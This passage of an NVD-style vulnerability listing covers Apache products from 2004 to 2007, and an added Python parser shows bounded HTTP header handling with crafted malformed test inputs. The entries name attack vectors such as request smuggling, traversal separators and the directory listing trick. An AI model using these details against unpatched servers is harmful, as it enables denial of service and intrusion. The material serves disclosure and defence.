CVE-2004-0942 MEDIUM

Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
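CVE-2004-0492, CVE-2004-0493 and CVE-2004-0942 above all come down to header parsing that either believes a value it should have rejected (a negative Content-Length cast to an unsigned copy length) or lets one client grow a buffer without limit (lines padded with thousands of spaces or tabs, and many of them). The block below is an added example, not httpd's parser, of a header reader with every growth path capped and a strict Content-Length check. The 8190 and 100 limits mirror httpd's LimitRequestFieldSize and LimitRequestFields defaults; MAX_FOLDED and MAX_CL_DIGITS are choices made for this example, and the inputs in the checks are constructed, not captured traffic.

```python
"""Bounded HTTP/1.x header parsing.

Added example, not httpd's code. MAX_LINE and MAX_FIELDS mirror httpd's
LimitRequestFieldSize and LimitRequestFields defaults; MAX_FOLDED and
MAX_CL_DIGITS are illustrative choices for this example."""
import re

MAX_LINE = 8190       # bytes per field line, continuation lines included
MAX_FIELDS = 100      # field lines accepted before the parser gives up
MAX_FOLDED = 8190     # total bytes a folded (multi-line) value may reach
MAX_CL_DIGITS = 19    # keeps Content-Length inside a signed 64-bit int

# RFC 7230 token characters, the only ones allowed in a field name.
_TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")


class HeaderError(ValueError):
    """Raised for any header block the parser refuses to accept."""


def parse_headers(raw):
    """Parse CRLF-terminated 'Name: value' lines up to the blank line.

    Continuation lines (leading SP/HTAB, obs-fold) are joined to the
    previous value with a single space, duplicates are comma-joined, and
    every way the stored data can grow is capped, so a client cannot make
    the parser allocate in proportion to whitespace it sends."""
    headers = {}
    last = None
    fields = 0
    for line in raw.split(b"\r\n"):
        if line == b"":
            break
        if len(line) > MAX_LINE:
            raise HeaderError("field line exceeds MAX_LINE")
        if line[:1] in (b" ", b"\t"):
            if last is None:
                raise HeaderError("continuation line before any field")
            folded = headers[last] + b" " + line.strip(b" \t")
            if len(folded) > MAX_FOLDED:
                raise HeaderError("folded field exceeds MAX_FOLDED")
            headers[last] = folded
            continue
        fields += 1
        if fields > MAX_FIELDS:
            raise HeaderError("too many header fields")
        name, sep, value = line.partition(b":")
        if not sep or not _TOKEN.match(name.decode("ascii", "replace")):
            raise HeaderError("malformed field line")
        key = name.decode("ascii").lower()
        value = value.strip(b" \t")
        headers[key] = headers[key] + b", " + value if key in headers else value
        last = key
    return headers


def content_length(headers):
    """Return Content-Length as a non-negative int, or None if absent.

    Only ASCII digits are accepted: a leading '-' or '+', embedded
    whitespace, or an over-long number is refused instead of being cast to
    an unsigned size and used as a copy length. Duplicates must agree."""
    raw = headers.get("content-length")
    if raw is None:
        return None
    values = {v.strip(b" \t") for v in raw.split(b",")}
    if len(values) != 1:
        raise HeaderError("conflicting Content-Length values")
    digits = values.pop()
    if not digits.isdigit() or len(digits) > MAX_CL_DIGITS:
        raise HeaderError("invalid Content-Length")
    return int(digits)


def is_rejected(raw):
    """True if parsing or the Content-Length check refuses the block."""
    try:
        content_length(parse_headers(raw))
        return False
    except HeaderError:
        return True


if __name__ == "__main__":
    for sample in (b"Content-Length: 12\r\n\r\n",
                   b"Content-Length: -1\r\n\r\n",
                   b"X: " + b" " * 9000 + b"\r\n\r\n"):
        print(sample[:40], "rejected" if is_rejected(sample) else "accepted")
```

A reverse proxy should apply the same check to the origin's response headers as to the client's request, since CVE-2004-0492 was reached through the upstream side; and whichever limit fires, the right response is to close the connection with a 400 rather than to process the request with the field dropped.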
CVE-2004-1082 HIGH

mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
openbsd openbsd current
hp virtualvault 4.6
avaya network_routing *
apache http_server 1.3.4
avaya modular_messaging_message_storage_server 2.0
hp virtualvault 4.7
avaya communication_manager 1.1
avaya communication_manager 1.3.1
apache http_server 1.3.22
apache http_server 1.3.14
sun sunos 5.8
apache http_server 1.3.29
openbsd openbsd 3.4
apache http_server 1.3.27
avaya communication_manager 2.0.1
sun solaris 9.0
apple apache_mod_digest_apple *
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.9
apache http_server 1.3.1
avaya mn100 *
hp webproxy a.02.10
apache http_server 1.3.17
apache http_server 1.3.26
hp webproxy a.02.00
apache http_server 1.3.6
apache http_server 1.3
sco openserver 5.0.7
sco openserver 5.0.6
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 1.3.28
apache http_server 1.3.20
ibm http_server 1.3.19
openbsd openbsd 3.5
apache http_server 1.3.18
avaya modular_messaging_message_storage_server 1.1
sun solaris 8.0
avaya communication_manager 2.0
avaya intuity_audix_lx *
hp virtualvault 4.5
apache http_server 1.3.3
CVE-2004-1387 LOW

The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.31
CVE-2004-1575 MEDIUM

The XML parser in Xerces-C++ 2.5.0 allows remote attackers to cause a denial of service (CPU consumption) via XML attributes in a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache xerces-c++ 2.5.0
CVE-2004-1834 LOW

mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2004-2343 HIGH

Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-2650 MEDIUM

Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache james 2.2.0
CVE-2004-2680 MEDIUM

mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache mod_python *
CVE-2005-0088 HIGH

The publisher handler for mod_python 2.7.8 and earlier allows remote attackers to obtain access to restricted objects via a crafted URL.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache mod_python 1.9a
apache mod_python 2.7
apache mod_python 2.7.7
apache mod_python 2.7.5
apache mod_python 2.3
apache mod_python 2.6
apache mod_python 2.7.3
apache mod_python 2.4.1
apache mod_python 2.2
apache mod_python 2.6.2
apache mod_python 2.6.1
apache mod_python *
apache mod_python 2.7.6
apache mod_python 2.0
apache mod_python 2.1
apache mod_python 2.4
apache mod_python 2.5
apache mod_python 2.7.2
apache mod_python 2.6.3
apache mod_python 2.6.4
apache mod_python 2.7.1
apache mod_python 2.7.4
CVE-2005-0108 MEDIUM

Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache mod_auth_radius 1.5.4
CVE-2005-0808 MEDIUM

Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.3.1a
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.2
apache tomcat 3.2.3
CVE-2005-1266 MEDIUM

Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache spamassassin 3.0.3
apache spamassassin 3.0.1
apache spamassassin 3.0.2
CVE-2005-1268 MEDIUM

Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-193

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 4.0
debian debian_linux 3.1
redhat enterprise_linux_server 3.0
redhat enterprise_linux_server 4.0
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_desktop 3.0
redhat enterprise_linux_workstation 4.0
CVE-2005-1344 HIGH

Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server 2.0.52
CVE-2005-2088 MEDIUM

The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.0
debian debian_linux 3.1
CVE-2005-2090 MEDIUM

Jakarta Tomcat 5.0.19 (Coyote/1.1) and Tomcat 4.1.24 (Coyote/1.0) allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Tomcat to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.0.19
apache tomcat 4.1.24
CVE-2005-2700 HIGH

ssl_engine_kernel.c in mod_ssl before 2.8.24, when using "SSLVerifyClient optional" in the global virtual host configuration, does not properly enforce "SSLVerifyClient require" in a per-location context, which allows remote attackers to bypass intended access restrictions.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.0
debian debian_linux 3.1
canonical ubuntu_linux 4.10
canonical ubuntu_linux 5.04
CVE-2005-2728 MEDIUM

The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.50
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.51
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.53
apache http_server 2.0.47
CVE-2005-2970 MEDIUM

Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770

Products Affected

Vendor Product Version
fedoraproject fedora_core 4
apache http_server *
redhat enterprise_linux_desktop 4.0
canonical ubuntu_linux 4.10
redhat enterprise_linux_server 3.0
canonical ubuntu_linux 5.04
redhat enterprise_linux_server 4.0
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_desktop 3.0
redhat enterprise_linux_workstation 4.0
canonical ubuntu_linux 5.10
CVE-2005-3164 LOW

The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200

Products Affected

Vendor Product Version
apache tomcat *
hitachi cosminexus_application_server 05_00_05_05_k
hitachi cosminexus_application_server 05_00_05_05_e
hitachi cosminexus_application_server 05_00_05_05_h
hitachi cosminexus_application_server 05_00_05_05_f
CVE-2005-3351 MEDIUM

SpamAssassin 3.0.4 allows attackers to bypass spam detection via an e-mail with a large number of recipients ("To" addresses), which triggers a bus error in Perl.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache spamassassin 3.0.4
CVE-2005-3352 MEDIUM

Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79

Products Affected

Vendor Product Version
apache http_server *
apache http_server 2.2
CVE-2005-3357 MEDIUM

mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399

Products Affected

Vendor Product Version
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.36
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.53
apache http_server 2.0.47
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.46
apache http_server 2.0.54
apache http_server 2.0.50
apache http_server 2.0.45
apache http_server 2.0.51
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2005-3510 MEDIUM

Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.5.10
apache tomcat 5.5.4
apache tomcat 5.5.9
apache tomcat 5.5.11
apache tomcat 5.5.2
apache tomcat 5.5.1
apache tomcat 5.5.6
apache tomcat 5.5.8
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.3
apache tomcat 5.5.0
CVE-2005-3745 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache struts 1.2.7
CVE-2005-4703 MEDIUM

Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2005-4836 HIGH

The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200

Products Affected

Vendor Product Version
apache tomcat 4.1.16
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.28
apache tomcat 4.1.29
apache tomcat 4.1.34
apache tomcat 4.1.31
apache tomcat 4.1.15
apache tomcat 4.1.21
apache tomcat 4.1.40
apache tomcat 4.1.17
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 4.1.22
apache tomcat 4.1.24
apache tomcat 4.1.19
apache tomcat 4.1.37
apache tomcat 4.1.27
apache tomcat 4.1.39
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 4.1.23
apache tomcat 4.1.36
CVE-2005-4838 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the example web applications for Jakarta Tomcat 5.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) el/functions.jsp, (2) el/implicit-objects.jsp, and (3) jspx/textRotate.jspx in examples/jsp2/, as demonstrated via script in a request to snp/snoop.jsp. NOTE: other XSS issues in the manager were simultaneously reported, but these require admin access and do not cross privilege boundaries.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79

Products Affected

Vendor Product Version
apache tomcat *
CVE-2005-4849 MEDIUM

Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200

Products Affected

Vendor Product Version
apache derby *
CVE-2006-0042 MEDIUM

Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo

Products Affected

Vendor Product Version
debian debian_linux 3.0
debian debian_linux 3.1
apache libapreq2 *
CVE-2006-0254 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache geronimo 1.0
CVE-2006-0743 MEDIUM

Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-134

Products Affected

Vendor Product Version
apache log4net 1.2.9_beta
CVE-2006-1095 HIGH

Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22

Products Affected

Vendor Product Version
apache mod_python 3.2.7
CVE-2006-1546 HIGH

Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache struts *
CVE-2006-1547 HIGH

ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.

CVSS 3.x

Source: nvd@nist.gov
Score: 7.5
Severity: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Exploitability: 3.9
Impact: 3.6

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other, CWE-749

Products Affected

Vendor Product Version
apache struts *
apache commons_beanutils 1.7.0
CVE-2006-1548 MEDIUM

Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache struts *
CVE-2006-20001

A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier.

Products Affected

Vendor Product Version
apache http_server *
CVE-2006-2447 MEDIUM

SpamAssassin before 3.1.3, when running with vpopmail and the paranoid (-P) switch, allows remote attackers to execute arbitrary commands via a crafted message that is not properly handled when invoking spamd with the virtual pop username.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo

Products Affected

Vendor Product Version
apache spamassassin 3.1.2
apache spamassassin 3.1.0
apache spamassassin 3.1.1
CVE-2006-2806 HIGH

The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache james 2.2.0
CVE-2006-3747 HIGH

Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.1
canonical ubuntu_linux 6.06
canonical ubuntu_linux 5.04
canonical ubuntu_linux 5.10
CVE-2006-3835 MEDIUM

Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (;) preceding a filename with a mapped extension, as demonstrated by URLs ending with /;index.jsp and /;help.do.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.5.12
apache tomcat 5.5.7
apache tomcat 5.5.9
CVE-2006-3918 MEDIUM

http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
redhat enterprise_linux_server 2.0
apache http_server *
debian debian_linux 3.1
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 2.0
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2006-5752 MEDIUM

Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 4.0
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_server 3.0
redhat enterprise_linux_server 4.0
fedoraproject fedora 7
redhat enterprise_linux_desktop 3.0
canonical ubuntu_linux 6.10
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_workstation 4.0
redhat enterprise_linux_server 5.0
canonical ubuntu_linux 7.04
redhat enterprise_linux_eus 4.5
CVE-2006-7195 MEDIUM

Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 5.0.12
apache tomcat 5.5.15
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.0.29
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.0.25
apache tomcat 5.5.0
apache tomcat 5.0.10
apache tomcat 5.0.13
apache tomcat 5.0.15
apache tomcat 5.0.28
apache tomcat 5.5.10
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.0.11
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.0.18
apache tomcat 5.0.0
apache tomcat 5.0.1
CVE-2006-7196 MEDIUM

Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 5.0.28
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.1
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.0
apache tomcat 5.0.7
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.0.12
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat *
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 5.5.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.2
apache tomcat 5.0.11
apache tomcat 5.0.18
apache tomcat 5.0.4
apache tomcat 5.0.1
CVE-2006-7197 HIGH

The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.5.15
CVE-2007-0086 HIGH

The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400

Products Affected

Vendor Product Version
apache http_server -
CVE-2007-0450 MEDIUM

Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22

Products Affected

Vendor Product Version
apache tomcat *
apache http_server -
CVE-2007-0774 HIGH

Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat_jk_web_server_connector 1.2.19
apache tomcat_jk_web_server_connector 1.2.20
CVE-2007-1355 MEDIUM

